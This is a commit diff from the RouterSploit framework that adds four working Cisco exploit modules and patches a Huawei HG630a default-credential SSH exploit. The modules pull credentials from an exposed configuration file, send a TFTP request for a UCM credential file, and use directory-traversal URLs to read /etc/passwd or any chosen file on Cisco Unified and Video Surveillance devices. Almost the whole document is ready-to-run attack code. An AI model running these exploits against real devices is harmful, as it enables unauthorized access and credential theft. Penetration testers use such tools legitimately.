Adding cisco exploits, fixing huawei hg630a exploit.

bf595cbd · Marcin Bury · a9cf160d · bf595cbd · bf595cbd · bf595cbd
Commit bf595cbd authored May 27, 2016 by Marcin Bury
5 changed files
--- a/routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
+++ b/routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    print_info,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Cisco DPC2420 Information Disclosure vulnerability.
+    If the target is vulnerable it allows to read sensitive information from the configuration file.
+    """
+    __info__ = {
+        'name': 'Cisco DPC2420 Info Disclosure',
+        'description': 'Module exploits Cisco DPC2420 information disclosure vulnerability which allows reading sensitive information from the configuration file.',
+        'authors': [
+            'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/23250/',
+        ],
+        'devices': [
+            'Cisco DPC2420',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(8080, 'Target Port')
+
+    def run(self):
+        url = "{}:{}/filename.gwc".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return
+
+        if response.status_code == 200 and "User Password" in response.text:
+            print_success("Exploit success - reading configuration file filename.gwc")
+            print_info(response.text)
+        else:
+            print_error("Exploit failed - could not read configuration file")
+
+    @mute
+    def check(self):
+        url = "{}:{}/filename.gwc".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if response.status_code == 200 and "User Password" in response.text:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
+
--- a/routersploit/modules/exploits/cisco/ucm_info_disclosure.py
+++ b/routersploit/modules/exploits/cisco/ucm_info_disclosure.py
+import socket
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    print_info,
+    mute,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Cisco UCM Information Disclosure vulnerability.
+    If the target is vulnerable, it is possible to read sensitive information through TFTP service.
+    """
+    __info__ = {
+        'name': 'Cisco UCM Info Disclosure',
+        'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
+        'authors': [
+            'Daniel Svartman <danielsvartman[at]gmail.com',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/30237/',
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7030',
+        ],
+        'devices': [
+            'Cisco UCM',
+        ],
+    }
+
+    target = exploits.Option('', 'Target IP address')
+
+    payload = "\x00\x01" + "SPDefault.cnf.xml" + "\x00" + "netascii" + "\x00"
+
+    def run(self):
+        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        sock.settimeout(10)
+
+        print_status("Sending payload")
+        sock.sendto(self.payload, (self.target, 69))
+
+        try:
+            response = sock.recv(2048)
+        except socket.timeout:
+            print_error("Exploit failed - device seems to be not vulnerable")
+            return
+
+        if len(response):
+            if "UseUserCredential" in response:
+                print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
+                print_info(response)
+            else:
+                print_error("Exploit failed - credentials not found in response")
+        else:
+            print_error("Exploit failed - empty response")
+
+    @mute
+    def check(self):
+        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        sock.settimeout(10)
+        sock.sendto(self.payload, (self.target, 69))
+
+        try:
+            response = sock.recv(2048)
+        except socket.timeout:
+            return False  # target is not vulnerable
+
+        if len(response) and "UseUserCredential" in response:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
+       
--- a/routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
+++ b/routersploit/modules/exploits/cisco/unified_multi_path_traversal.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    print_info,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Path Traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.
+    If the target is vulnerable it allows to read files from the filesystem.
+    """
+    __info__ = {
+        'name': 'Cisco Unified Multi Path Traversal',
+        'description': 'Module exploits path traversal vulnerability in Cisco Unified Communications Manager, Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices.'
+                       'If the target is vulnerable it allows to read files from the filesystem.',
+        'authors': [
+            'Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/36256/',
+            'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3315',
+        ],
+        'devices': [
+            'Cisco Unified Communications Manager 5.x',
+            'Cisco Unified Communications Manager 6.x < 6.1(5)',
+            'Cisco Unified Communications Manager 7.x < 7.1(5b)',
+            'Cisco Unified Communications Manager 8.x < 8.0(3)',
+            'Cisco Unified Contact Center Express',
+            'Cisco Unified IP Interactive Voice Response < 6.0(1)',
+            'Cisco Unified IP Interactive Voice Response 7.0(x) < 7.0(2)',
+            'Cisco Unified IP Interactive Voice Response 8.0(x) < 8.5(1)',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
+
+    def run(self):
+        url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return
+
+        if response.status_code == 200 and len(response.text):
+            print_success("Exploit success - reading file {}".format(self.filename))
+            print_info(response.text)
+        else:
+            print_error("Exploit failed - could not read file")
+
+    @mute
+    def check(self):
+        url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if response.status_code == 200 and len(response.text):
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/cisco/video_surv_path_traversal.py
+++ b/routersploit/modules/exploits/cisco/video_surv_path_traversal.py
+from routersploit import (
+    exploits,
+    print_success,
+    print_status,
+    print_error,
+    print_info,
+    http_request,
+    mute,
+    validators,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for Path Traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices.
+    If the target is vulnerable, it allows to read files from the filesystem.
+    """
+    __info__ = {
+        'name': 'Cisco Unified Multi Path Traversal',
+        'description': 'Module exploits path traversal vulnerability in Cisco Video  Surveillance Operations Manager 6.3.2 devices.'
+                       'If the target is vulnerable it allows to read files from the filesystem.',
+        'authors': [
+            'b.saleh',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/38389/',
+        ],
+        'devices': [
+            'Cisco Video Surveillance Operations Manager 6.3.2',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
+    filename = exploits.Option('/etc/passwd', 'File to read from the filesystem')
+
+    def run(self):
+        url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return
+
+        if response.status_code == 200 and len(response.text):
+            print_success("Exploit success")
+            print_status("Reading file: {}".format(self.filename))
+            print_info(response.text)
+        else:
+            print_error("Exploit failed - could not read file")
+       
+    @mute
+    def check(self):
+        url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd".format(self.target, self.port)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
+            return False  # target is not vulnerable
+
+        if response.status_code == 200 and len(response.text):
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/huawei/hg630a_default_creds.py
+++ b/routersploit/modules/exploits/huawei/hg630a_default_creds.py
@@ -39,7 +39,7 @@ class Exploit(exploits.Exploit):

        try:
            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
-        except paramiko.ssh_exception.SSHException:
+        except (paramiko.ssh_exception.SSHException, socket.error):
            print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
            return
        else:
@@ -87,7 +87,7 @@ class Exploit(exploits.Exploit):

        try:
            ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
-        except (paramiko.ssh_exception.SSHException, paramiko.ssh_exception.NoValidConnectionsError):
+        except (paramiko.ssh_exception.SSHException, socket.error):
            return False  # target is not vulnerable
        else:
            return True  # target is vulnerable